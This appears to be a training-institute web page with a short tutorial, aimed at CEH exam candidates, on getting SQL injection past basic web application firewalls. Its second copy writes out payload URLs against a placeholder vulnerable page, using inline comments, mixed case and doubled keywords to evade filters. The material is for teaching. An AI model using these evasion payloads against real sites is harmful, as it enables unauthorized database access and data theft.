| Filename | Basic WAF Bypassing within SQLi |
| Permission | rw-r--r-- |
| Author | Unknown |
| Date and Time | 7/26/2016 |
| Label | Basic Tutorials| Penetration |
| Action |
Institute For Ethical Hacking Course and Ethical Hacking Training in Pune - India
Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan
Hey all,
I have recently noticed quite a few CEH candidates are having trouble with challenges that involve WAF bypassing so here's a tutorial/reference for bypassing basic WAF's
What is a WAF?
WAF stands for Web Application Firewall. A WAF is put in place by the web applications administrator in an attempt to prevent attacks such as SQLi and XSS. They detect malicious attempts with the use of signature based filters and escapes defined within a list of rules. As a result of this design, they are vulnerable to being easily bypassed by obfuscating your exploit code.
Methods of Bypass
There are many more ways of bypassing these than I can list here but this is a basic overview of three common and easy methods to try first.
1. Comments
Comments can allow you to execute code without the WAF bothering check it.
Example
Before:
After:
2. Capitalization of Functions
Because detections are signature based, randomly capitalizing functions can allow them to slip under the heuristic radar.
Example
Before:
After:
3. Exploiting Escapes
Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another.
Example
Before:
After:
Assuming the filter escapes the keywords "union" and "select", our code will be executed as normal.
www.extremehacking.org
Cyber Suraksha Abhiyan, CEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY, MCITP, RHCE, CHECKPOINT, ASA FIREWALL, VMWARE, CLOUD, ANDROID Hacking, IPHONE Hacking, NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India
Sadik Shaikh | Extreme Hacking | Cyber Suraksha Abhiyan
Hey all,
I have recently noticed quite a few CEH candidates are having trouble with challenges that involve WAF bypassing so here's a tutorial/reference for bypassing basic WAF's
What is a WAF?
WAF stands for Web Application Firewall. A WAF is put in place by the web applications administrator in an attempt to prevent attacks such as SQLi and XSS. They detect malicious attempts with the use of signature based filters and escapes defined within a list of rules. As a result of this design, they are vulnerable to being easily bypassed by obfuscating your exploit code.
Methods of Bypass
There are many more ways of bypassing these than I can list here but this is a basic overview of three common and easy methods to try first.
1. Comments
Comments can allow you to execute code without the WAF bothering check it.
Example
Before:
Code:
http://site.com/vuln.php?id=-1 UNION SELECT 1,2,3--After:
Code:
http://site.com/vuln.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--2. Capitalization of Functions
Because detections are signature based, randomly capitalizing functions can allow them to slip under the heuristic radar.
Example
Before:
Code:
http://site.com/vuln.php?id=-1 UNION SELECT 1,2,3--After:
Code:
http://site.com/vuln.php?id=-1 uNiOn SeLeCt 1,2,3--3. Exploiting Escapes
Some WAF's will escape certain keywords such as UNION, SELECT, ORDER BY, etc. This can be used to our advantage by duplicating the detected word within another.
Example
Before:
Code:
http://site.com/vuln.php?id=-1 UNION SELECT 1,2,3--After:
Code:
http://site.com/vuln.php?id=-1 UNIunionON SEselectLECT 1,2,3--Assuming the filter escapes the keywords "union" and "select", our code will be executed as normal.
Cyber Suraksha Abhiyan, CEHv9, CHFI, ECSAv9, CAST, ENSA, CCNA, CCNA SECURITY, MCITP, RHCE, CHECKPOINT, ASA FIREWALL, VMWARE, CLOUD, ANDROID Hacking, IPHONE Hacking, NETWORKING HARDWARE,TRAINING INSTITUTE IN PUNE, Certified Ethical Hacking,Center For Advanced Security Training in India, ceh v9 course in Pune-India, ceh certification in pune-India, ceh v9 training in Pune-India, Ethical Hacking Course in Pune-India